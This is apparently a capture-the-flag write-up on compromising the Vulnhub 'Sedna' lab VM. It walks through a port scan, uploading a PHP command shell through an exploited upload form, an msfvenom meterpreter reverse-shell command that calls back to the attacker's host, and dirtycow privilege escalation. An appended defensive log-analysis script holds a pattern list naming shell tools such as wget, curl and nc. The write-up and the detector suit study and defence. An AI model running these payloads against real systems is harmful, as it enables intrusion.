We are on a roll this week! With this slew of new VMs up on Vulnhub, there is plenty to keep me busy. Today’s episode: Sedna.
Sedna is the “Intermediate” difficulty VM in a progressively more difficult 3-part series. Let’s see if it lives up to the difficulty rating.
As per the norm, I start off by scanning the target machine to see what services we’re working with:
Nmap scan report for 192.168.110.132
Host is up (0.00016s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
| 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_ 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp open domain ISC BIND 9.9.5-3-Ubuntu
|_ bind.version: 9.9.5-3-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
Ok, 80 and 8080 stick out as potential first targets, so let’s take a look at what’s on 80:
Similar to Quaoar, we’ve got a picture of a rendered planet and it takes you to a “Hack the planet” picture when it’s clicked on:
As for 8080, it just gives us a Tomcat7 landing page. Nothing too interesting, so let’s run wfuzz to see if we can find some interesting dirs:
No dice. Ok, let’s figure out what’s running on port 80. After some digging through each directory from the wfuzz scan, I find what I’m looking for at http://192.168.110.132/themes/default_theme_2015/description.txt:
A quick search in searchsploit turns up a single lonely exploit:
Next we modify the script to point to our target (after verifying the path exists on the target), place it in /var/www/html, start Apache, and navigate to 127.0.0.1. We’re presented with a form upload page. Upload a basic PHP command shell:
Once it’s sent we’re able to run commands:
I tried a few basic reverse shells to no avail and decided to move to an msfvenom payload:
root@z00n-kali:~/Documents/vulnhub/sedna/loot# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.110.128 LPORT=53 -f elf >msfshell
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 71 bytes
Final size of elf file: 155 bytes
I upload the payload, use curl to make the file executable, prepare Metasploit, and execute the shell:
Navigating to /var/www/ gets us the first flag:
Next up is figuring out the best way to root. I load up Metasploit’s exploit suggester module:
None of these end up working, so I give dirtycow a shot:
It worked! I guess I should start testing dirtycow on everything from now on. That’s a quick win if it’s vuln. I quickly grab the flag, and it’s game over. There are apparently 2 more post-exploitation flags, but the one I’m immediately aware of is a cracking challenge, so I didn’t bother with it.
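Seen from the defender's side, the upload-then-execute steps above (a PHP command shell pushed through an upload form, then commands run through it, including making the uploaded payload executable) leave a clear trail in the web server's access log. The following is an added example, not part of the original write-up or any tool it used: the log lines, the `/files/` and `/upload-handler/` paths and the `cmd` parameter name are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache access-log lines. The paths, the "cmd" parameter and the
# timestamps are assumptions; only 192.168.110.128 and "msfshell" are from the post.
SAMPLE_LOG = """\
192.168.110.128 - - [01/Jan/2017:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 101 "-" "Mozilla/5.0"
192.168.110.128 - - [01/Jan/2017:12:01:10 +0000] "POST /upload-handler/index.php HTTP/1.1" 200 45 "-" "Mozilla/5.0"
192.168.110.128 - - [01/Jan/2017:12:01:30 +0000] "GET /files/shell.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"
192.168.110.128 - - [01/Jan/2017:12:02:05 +0000] "GET /files/shell.php?cmd=chmod%20%2Bx%20msfshell HTTP/1.1" 200 0 "-" "curl/7.52.1"
10.0.0.7 - - [01/Jan/2017:12:03:00 +0000] "GET /search.php?q=chmod+tutorial HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2017:12:04:00 +0000] "GET /files/avatar.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Values that start with a common shell command name (deliberately short list).
SHELL_RE = re.compile(r'^\s*(id|whoami|uname|ls|cat|chmod|wget|curl|nc|bash|sh|python|perl)\b')
UPLOAD_DIRS = ("/files/", "/uploads/")  # assumption: where the app stores user uploads


def analyse(log_text):
    """Return findings for PHP scripts executed from upload directories."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a well-formed access-log line
        client, when, method, target, status = m.groups()
        url = urlsplit(target)
        # Signal 1: a script served from a directory that should hold only data.
        if not (url.path.lower().endswith(".php") and url.path.startswith(UPLOAD_DIRS)):
            continue
        # Signal 2: a decoded parameter value that reads like a shell command.
        commands = [v for _, v in parse_qsl(url.query) if SHELL_RE.match(v)]
        findings.append({
            "client": client, "time": when, "path": url.path, "status": int(status),
            "commands": commands,
            # Shell-like parameters alone (e.g. a search for "chmod") are too noisy
            # to alert on, so they only raise the severity of signal 1.
            "severity": "high" if commands else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f["severity"], f["client"], f["path"], f["commands"])
```

Detection like this only tells you after the fact; the durable fix is to stop the web server from executing PHP out of upload directories at all, and to validate what the upload handler accepts.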